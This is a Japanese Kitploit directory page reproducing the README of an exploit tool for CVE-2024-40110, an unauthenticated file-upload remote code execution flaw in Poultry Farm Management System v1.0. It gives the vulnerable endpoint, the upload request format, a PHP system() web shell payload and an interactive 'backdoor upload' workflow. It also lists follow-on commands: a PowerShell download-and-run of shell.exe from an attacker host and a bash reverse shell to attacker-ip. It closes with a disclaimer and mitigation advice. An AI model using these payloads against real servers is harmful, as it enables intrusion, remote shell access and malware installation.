Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-40110 — Poultry Farm Management System v1.0のCVE-2024-40110のエクスプロイト。認証なしのファイルアップロードRCEです。PHPシェルをアップロードして、ターゲット上で任意のコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/angry-althaf/cve-2024-40110
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Poultry Farm Management System v1.0のCVE-2024-40110のエクスプロイト。認証なしのファイルアップロードRCEです。PHPシェルをアップロードして、ターゲット上で任意のコマンドを実行します。

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

養鶏管理システム v1.0 - RCEエクスプロイト

脆弱性タイプ

認証不要のファイルアップロードによるリモートコード実行

説明

Poultry Farm Management System v1.0 には、商品アップロード機能に重大な脆弱性が存在します。このアプリケーションはファイルアップロードの検証とサニタイズを適切に行っていないため、攻撃者は商品画像を装ったPHPファイルをアップロードすることができます。アップロードされたPHPファイルは実行可能であり、リモートコード実行を達成できます。

脆弱なエンドポイント

root@kitploit:~
POST /paultry/farm/product.php または POST /farm/product.php

攻撃ベクトル

この脆弱性は以下の方法で悪用できます:

  1. 商品アップロードエンドポイントにPOSTリクエストを送信する
  2. 任意のコマンドを含むPHPシェルファイルをアップロードする
  3. アップロードしたファイルにアクセスして埋め込まれたコマンドを実行する

必要条件

前提条件

  • Python 3.7+
  • requests ライブラリ
  • colorama ライブラリ (カラー出力用)
  • 脆弱なターゲットへのネットワークアクセス

インストール

root@kitploit:~
pip install requests colorama

またはすべての依存関係をインストール:

root@kitploit:~
pip install -r requirements.txt

使用方法

基本的な使用方法

スクリプトを対話的に実行:

root@kitploit:~
python exploit.py

スクリプトは以下の入力を求めます:

  1. ターゲットIPアドレス - 脆弱なサーバーのIPアドレス
  2. ターゲットポート - ポート番号 (デフォルト: 80)
  3. 実行するコマンド - ターゲット上で実行するシステムコマンド

例

root@kitploit:~
==================================================
対話型バックドアアップロードツール
==================================================

ターゲットIPアドレスを入力: 192.168.1.100
ターゲットポートを入力 (デフォルト: 80): 8080
実行するコマンドを入力 (デフォルト: powershellペイロード):
コマンド: whoami

==================================================
確認
==================================================
ターゲットURL: http://192.168.1.100:8080
コマンド: whoami
続行しますか? (yes/no): yes

機能

✅ 対話型入力 - IP、ポート、カスタムコマンドを入力
✅ デフォルト値 - 便利なデフォルト値
✅ カラー表示の出力 - 読みやすいカラー端末出力
✅ 確認ステップ - 実行前に設定を確認
✅ エラーハンドリング - 失敗したリクエストに対する適切なエラーメッセージ
✅ 柔軟なコマンド - 任意のシェルコマンドまたはPowerShellペイロードに対応

よく使われるコマンド

Windowsターゲット

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Linuxターゲット

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

情報収集

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

技術詳細

動作の仕組み

  1. ファイルアップロード: PHPペイロードをファイルとして埋め込んだPOSTリクエストを送信
  2. ペイロードの実行: アップロードされたPHPファイルは /assets/img/productimages/ に保存される
  3. コマンド実行: PHPファイルにアクセスすると、system() 関数を介してコマンドが実行される
  4. 出力の取得: スクリプトはGETリクエストで出力を取得

リクエスト構造

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

ペイロード形式

root@kitploit:~
<?php system('COMMAND_HERE');?>

テスト環境

このエクスプロイトは以下でテスト済み:

  • OS: Windows 10
  • サーバー: XAMPP v3.3.0
  • PHPバージョン: PHP 5.6+ と互換性あり

免責事項

⚠️ 法的注意

このツールは許可されたセキュリティテストおよび教育目的のみで提供されています。コンピュータシステムへの不正アクセスは違法です。

  • このエクスプロイトは、自分が所有するシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください
  • 著者は、このツールの誤用や損害について一切の責任を負いません
  • ユーザーは、該当するすべての法律および規制を遵守する責任を負います
  • コンピュータシステムへの不正アクセス、改変、または妨害は、米国コンピュータ詐欺及び悪用取締法(CFAA)および世界各国の同様の法律に基づく連邦犯罪です

緩和策

管理者向け

  1. ソフトウェアの更新 - 利用可能な場合はセキュリティパッチを適用

  2. ファイルアップロードの検証

    • ファイル拡張子を検証(ホワイトリスト: jpg、png、gif など)
    • サーバー側でMIMEタイプを確認
    • アップロードされたファイルをWebルート外に保存
    • アップロードディレクトリでのスクリプト実行を無効化
  3. 設定

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. アクセス制御

    • アップロード前に認証を実装
    • ユーザー権限を検証
    • レート制限を追加
  5. 監視

    • アップロードディレクトリ内の不審なファイルを監視
    • すべてのアップロード試行をログに記録
    • ファイル整合性チェックを実装

参考資料

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • 元のソフトウェア: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

トラブルシューティング

接続拒否

root@kitploit:~
エラー: 接続が拒否されました
解決策: ターゲットのIPとポートが正しいこと、アプリケーションが実行中であることを確認してください

404 Not Found

root@kitploit:~
エラー: シェルのアップロードに失敗しました。ステータスコード: 404
解決策: エンドポイントのパスが異なる可能性があります。一般的なパス: /farm/、/paultry/farm/

PHPが実行されない

root@kitploit:~
エラー: コマンド出力が空です
解決策: PHPの実行が無効になっているか、ファイルが正しくアップロードされていない可能性があります

サポート

問題、質問、改善については、GitHubリポジトリまたはExploit-DBページを参照してください。


最終更新日: 2024年12月
ステータス: 検証済み、テスト済み

ツールをダウンロード